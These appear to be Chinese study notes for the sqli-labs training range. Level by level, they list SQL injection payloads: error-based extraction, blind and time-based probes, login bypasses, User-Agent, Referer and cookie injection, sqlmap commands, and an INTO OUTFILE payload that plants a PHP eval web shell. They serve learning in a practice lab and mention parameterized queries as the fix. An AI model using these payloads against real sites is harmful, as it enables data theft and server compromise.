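sqli-labs(Basic)

说明:每关第一行是后端拼接用户输入后执行的查询语句形式,其后各行是该关记录的测试输入。各关的注入点都来自把输入直接拼接进 SQL 字符串;改用参数化查询(预编译语句)后,输入只作为值绑定,引号和括号的闭合方式不再影响语句结构。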

Less-1:

select * from table where id='1' limit 0,1;

Less-2:

select * from table where id=1 limit 0,1;

Less-3:

select * from table where id=('1') limit 0,1;

Less-4:

select * from table where id=("1") limit 0,1;

盲注:

Less-5:

select * from table where id='1' limit 0,1;

and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
and updatexml(1,concat(0x7e,(select version()),0x7e),1)%23

Less-6:

select * from table where id="1" limit 0,1;

Less-7:

select * from table where id=(('1')) limit 0,1;

and left(version(),1)=5%23
show variables like '%secure%';
my.ini>>secure_file_priv="/"  (靶场配置:secure_file_priv 限定 into outfile 可写入的目录,设为 NULL 时禁止导入导出;写文件还要求数据库账户具有 FILE 权限)
union select 1,2,<?php @eval($_POST["x"])?> into outfile *"path"%23

Less-8:

select * from table where id='1' limit 0,1;


基于时间的盲注:

Less-9:

select * from table where id='1' limit 0,1;
and sleep(5)%23
and if(ascii(substr(database(),0,1))=115,0,sleep(5))%23

Less-10:

select * from table where id="1" limit 0,1;


POST:

Less-11:

select * from table where username='admin' and password='admin' limit 0,1;
admin' or '1'='1#
1' union select 1,database()#
sqlmap --form

Less-12:

select * from table where username=("admin") and password=("admin") limit 0,1;
admin") or 1=1#
admin") or ("1")=("1#


盲注:

Less-13:

select * from table where username=('admin') and password=('admin') limit 0,1;
and extractvalue(1,concat(0x7e,(select version()),0x7e))#

Less-14:

select * from table where username="admin" and password="admin" limit 0,1;


Less-15:(无法报错,即页面不回显数据库错误信息)

select * from table where username='admin' and password='admin' limit 0,1;

Less-16:

select * from table where username=("admin") and password=("admin") limit 0,1;

Less-17:(uname 参数已做过滤,注入点在 passwd 参数)

update table set password='admin' where username='admin';
&passwd=admin'and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
sqlmap --data "uname=admin&passwd=admin&submit=Submit"

Less-18:

(uname、passwd 均已做过滤,注入点在写入数据库的 User-Agent 请求头)
insert into table(a,b,c) values('user-agent','ip','uname');
'and '1'='1
'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and '1'='1
sqlmap -r xx.txt --technique E

Less-19:

insert into table(a,b) values('referer','ip');
referer处注入

Less-20:

select * from table where user='cookie' limit 0,1;
cookie处注入

原文地址:https://www.cnblogs.com/f1veseven/p/13399119.html